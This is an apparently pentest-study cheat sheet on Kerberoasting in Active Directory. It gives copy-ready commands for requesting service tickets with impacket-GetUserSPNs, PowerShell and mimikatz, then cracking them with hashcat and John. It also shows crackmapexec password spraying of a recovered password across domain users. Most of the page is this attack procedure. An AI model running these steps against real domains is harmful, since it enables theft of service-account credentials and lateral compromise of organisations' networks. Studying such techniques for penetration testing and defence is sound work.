# Kerberoast

## Theory

Kerberoasting is an extremely common attack in active directory environments which targets Active Directory accounts with the SPN value set. Common accounts with the SPN **(Service Principal Name)** set are service accounts such as IIS User/MSSQL etc.

Kerberoasting involves requesting a Kerb Service Ticket (TGS) from a Windows Domain Machine or Kali Box using something like **GetUserSPN’s.py**. The problem with **TGS** is once the the **DC** looks up the target **SPN** it encrypts the **TGS** with the **NTLM Password Hash** of the targeted user account.

## Having a Credential

### Step 1: Impacket-GetUserSPNs

Use `impacket-GetUserSPNs` to gather SPNs. Must hava valid credential:

```shell
impacket-GetUserSPNs.py '<domain>/<username>:<password>' -dc-ip <target_ip> -request
```

### Step 2: Crack the TGS ticket with hashcat

Save the TGS ticket as `hash.txt` and crack it with hashcat mode 13100:

```shell
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
```

## Having a Shell

### Step 1: GetUserSPNs

Transfer the `GetUserSPNs.ps1` script from the following Github repo to the victim machine and run it:

<https://github.com/nidem/kerberoast>

```powershell
powershell -ep bypass
.\GetUserSPNs.ps1
```

### Step 2: Request service tickets

Execute the following two commands in PowerShell:

```powershell
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<SPN>'
```

Or request ticket with Mimikatz:

```powershell
.\mimikatz.exe
    privilege::debug
    kerberos::ask /target:<spn>
```

### Step 3: Export service ticket to kirbi file

Transfer `/usr/share/windows-resources/mimikatz/x64/mimikatz.exe` to the victim machine and export service ticket:

```powershell
.\mimikatz.exe
    privilege::debug
    kerberos::list /export
```

Download the kirbi file to Kali.

### Step 4: Crack the kirbi file with John

Convert the kirbi file to John's format:

```shell
python3 /usr/share/windows-resources/kerberoast/kirbi2john.py '<kirbi_file>' > hash.txt
```

Note that this `kirbi2john.py` script is also from the "kerberoast" Github repo mentioned above. Don't use the Kali built-in `kirbi2john`, it does not work by the time of writing.

Crack the hash with John:

```shell
john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

## Password Spray

Note that users might reuse the same password for different accounts. Once we get a plaintext password, spray it on the username list you collectedfrom `net user /domain` with crackmapexec:

```shell
crackmapexec smb <target_ip> -u users.txt -p <password>
```

## Reference

{% embed url="<https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html#kerberoast>" %}
How To Attack Kerberos 101 - m0chan
{% endembed %}